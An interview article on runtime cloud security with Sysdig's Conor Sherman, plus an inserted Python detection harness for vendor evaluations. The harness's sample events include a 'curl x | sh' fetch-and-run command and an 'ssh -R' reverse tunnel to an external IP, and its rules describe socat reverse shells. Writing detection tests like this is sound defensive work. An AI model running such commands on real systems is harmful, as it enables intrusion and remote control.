Security leaders face a substantial challenge as artificial intelligence accelerates both innovation and cyber threats, with attackers now capable of compromising cloud environments in just eight minutes. Focusing on runtime security is an important part of dealing with that challenge, according to Conor Sherman from Sysdig.
Sherman is the CISO in Residence at Sysdig. He works alongside Sysdig’s customers to address real-world security challenges. We sat down with him during the RSAC 2026 Conference to discuss, among other things, how this role helps bridge the gap between product development and the actual needs of enterprise security teams protecting critical workloads.
The dual mandate facing modern CISOs
Security leaders today wear two hats simultaneously. They must transform their own organizations to become security-first while also serving as trusted advisors to the rest of the business. This dual mandate creates significant pressure as CISOs attempt to keep pace with rapid AI adoption across their enterprises while maintaining appropriate security guardrails.
The challenge cannot be met by simply saying no to new technologies. Growth risk and security risk are tightly correlated, and organizations that fail to adopt AI quickly enough face potential competitive disadvantages. Sherman stresses that winning security strategies are moving away from tactical approaches toward focusing on principles. They enable security teams to provide meaningful guidance without becoming bottlenecks to innovation.
The most effective security leaders are those who dedicate time to hands-on exploration of new technologies, Sherman says. Even seasoned executives with 20 years of experience are returning to lab environments, experimenting with new protocols and technologies to develop deep technical understanding. This knowledge enables them to have nuanced conversations about risk when advising business leaders on AI initiatives.
Why runtime security has moved to the forefront
For organizations operating at scale or in highly regulated environments, real-time visibility into cloud infrastructure has always been important. However, the advent of AI has elevated runtime security from a specialized concern to a mainstream priority. Sherman cites Sysdig research that found threat actors achieving complete compromise of cloud accounts in as little as eight minutes.
Traditional posture management and log analysis approaches are insufficient when attacks happen this quickly. Security teams cannot rely on notification-based workflows in which an engineer wakes up at 2:00 AM to respond to an alert. By the time a human can investigate, the attack has already concluded, and the forensic data has often disappeared along with the ephemeral workloads it lived on.
This reality has driven demand for active defense mechanisms that can respond to threats in real time. Runtime security provides kernel-level visibility into system calls, enabling detection and response at the speed required to counter modern attacks. For AI workloads in particular, this becomes essential, according to Sherman.
Navigating the layer cake of security tools
Security leaders face constant pitches for new tools and technologies, creating fatigue around adding yet another layer to an already complex security stack. Financial constraints force difficult decisions about where to invest limited budgets. Sherman acknowledges this challenge when we bring it up, but also suggests that the current moment offers opportunities to simplify rather than merely add layers.
AI and automation give security teams the ability to rethink their tool portfolios. For the first time, many security leaders are evaluating where open source solutions or in-house development might replace commercial tools. This is a change from historical patterns where security teams primarily purchased solutions rather than building them.
The key is starting from first principles, Sherman argues: identifying the most critical assets and determining what protection they require. For many organizations, this means cloud infrastructure and AI workloads. When security leaders take this approach, they often find that they need strong foundational platforms for data collection and analysis, but may be able to handle edge cases internally rather than purchasing specialized tools for every scenario.
The ephemeral workload challenge
Cloud-native architectures create fundamental challenges for security telemetry. Containers are ephemeral by design, existing for brief periods before being replaced. Serverless workloads may live for only seconds. By the time security teams attempt to investigate an incident, the evidence may already have disappeared.
This reality requires security instrumentation that operates at the kernel level, capturing system call data before workloads terminate. The collected telemetry must be immediately transferred to persistent storage for later forensic analysis and training purposes. Organizations that fail to implement this level of visibility find themselves unable to conduct meaningful incident investigations.
What CISOs should demand from security vendors
When asked about it, Sherman offers up some specific advice for security leaders evaluating runtime security and cloud defense platforms. First of all: arrive with independent test cases. Security vendors make many claims, but proof requires hands-on validation of real attack scenarios.
During vendor evaluations, security teams should deploy the technology and run complete attack simulations end-to-end. This will show whether vendors can actually capture the telemetry they claim, detect command and control communications, and identify reverse tunneling attempts. Many vendors fail these practical tests despite impressive marketing materials, Sherman says.
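To make the "independent test cases" idea concrete, the following is an added example (not code from the original article, from Sherman or from Sysdig) of the kind of small detection harness a buyer could bring to an evaluation. It replays constructed syscall-style events through a few rules that cover the scenarios the interview names: a shell spawned inside a container, outbound connections to non-allowlisted destinations, an ssh or socat reverse tunnel, and periodic beaconing to one destination. The event schema, field names, allowlist and sample events are all assumptions made for this example; no real runtime-security product uses this exact format.

```python
import ipaddress
import statistics
from collections import defaultdict
from dataclasses import dataclass, field


# Constructed event schema. Real kernel-level tooling emits far richer records;
# these fields are assumptions made for this example only.
@dataclass
class Event:
    ts: float               # seconds since start of capture
    container: str          # container id / name
    proc: str               # executable name
    parent: str             # parent executable name
    evt_type: str           # "execve" or "connect"
    args: list = field(default_factory=list)
    dst_ip: str = ""
    dst_port: int = 0


SHELLS = {"sh", "bash", "dash", "zsh"}
# Assumed egress allowlist for the workload under test (internal range only).
ALLOWED_EGRESS = [ipaddress.ip_network("10.0.0.0/8")]


def shell_in_container(e: Event):
    """Shell spawned by a non-shell parent: a common post-exploitation signal."""
    if e.evt_type == "execve" and e.proc in SHELLS and e.parent not in SHELLS:
        return f"shell '{e.proc}' spawned by '{e.parent}' in {e.container}"
    return None


def unexpected_egress(e: Event):
    """Outbound connect() to an address outside the egress allowlist (possible C2)."""
    if e.evt_type == "connect" and e.dst_ip:
        ip = ipaddress.ip_address(e.dst_ip)
        if not any(ip in net for net in ALLOWED_EGRESS):
            return f"{e.proc} in {e.container} connected to {e.dst_ip}:{e.dst_port} (not allowlisted)"
    return None


def reverse_tunnel(e: Event):
    """ssh -R remote forwards and socat EXEC-to-TCP pipes: the 'phone home' shape."""
    if e.evt_type != "execve":
        return None
    if e.proc == "ssh" and "-R" in e.args:
        return f"ssh remote port forward from {e.container}: {' '.join(e.args)}"
    if e.proc == "socat" and any(a.lower().startswith("tcp:") for a in e.args) \
            and any(a.upper().startswith("EXEC:") for a in e.args):
        return f"socat reverse shell from {e.container}: {' '.join(e.args)}"
    return None


class BeaconDetector:
    """Stateful rule: repeated connects to one destination at a near-constant
    interval. Needs at least min_hits samples and fires when the coefficient of
    variation of the inter-arrival times is at or below max_cv."""

    def __init__(self, min_hits=4, max_cv=0.15):
        self.min_hits, self.max_cv = min_hits, max_cv
        self.hist = defaultdict(list)

    def __call__(self, e: Event):
        if e.evt_type != "connect":
            return None
        key = (e.container, e.dst_ip, e.dst_port)
        self.hist[key].append(e.ts)
        ts = self.hist[key]
        if len(ts) < self.min_hits:
            return None
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
        if cv <= self.max_cv:
            return f"beaconing: {key[0]} -> {key[1]}:{key[2]} every ~{mean:.0f}s (cv={cv:.2f})"
        return None


def run_detections(events):
    """Run every rule over every event in order; return (ts, finding) pairs."""
    rules = [shell_in_container, unexpected_egress, reverse_tunnel, BeaconDetector()]
    findings = []
    for e in events:
        for rule in rules:
            hit = rule(e)
            if hit:
                findings.append((e.ts, hit))
    return findings


# Constructed scenario, not captured telemetry: the app spawns a shell, the shell
# opens an ssh -R tunnel out, then the app beacons to an external IP every 60s.
SAMPLE_EVENTS = [
    Event(0, "api-7f9", "app", "containerd-shim", "execve", ["app"]),
    Event(5, "api-7f9", "sh", "app", "execve", ["sh", "-c", "curl x | sh"]),
    Event(6, "api-7f9", "curl", "sh", "connect", dst_ip="10.20.0.5", dst_port=443),
    Event(7, "api-7f9", "ssh", "sh", "execve", ["ssh", "-R", "9000:localhost:22", "u@203.0.113.9"]),
    Event(8, "api-7f9", "ssh", "sh", "connect", dst_ip="203.0.113.9", dst_port=22),
] + [Event(60 + 60 * i, "api-7f9", "app", "containerd-shim", "connect",
           dst_ip="198.51.100.7", dst_port=443) for i in range(5)]

if __name__ == "__main__":
    for ts, finding in run_detections(SAMPLE_EVENTS):
        print(f"t={ts:>4}  {finding}")
```

The point of bringing something like this to an evaluation is not the rules themselves but the replay: the same scripted scenario is run against the candidate platform, and the buyer checks that each expected finding appears with the process lineage and destination intact, and that the evidence survives once the container is gone.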
Beyond initial capability testing, security leaders should push vendors to maximize the value of collected data. Runtime telemetry that reveals how assets actually operate can enrich vulnerability management programs and cloud risk assessments. Vendors should demonstrate how their platforms use data intelligently across multiple security functions rather than solving only narrow point problems.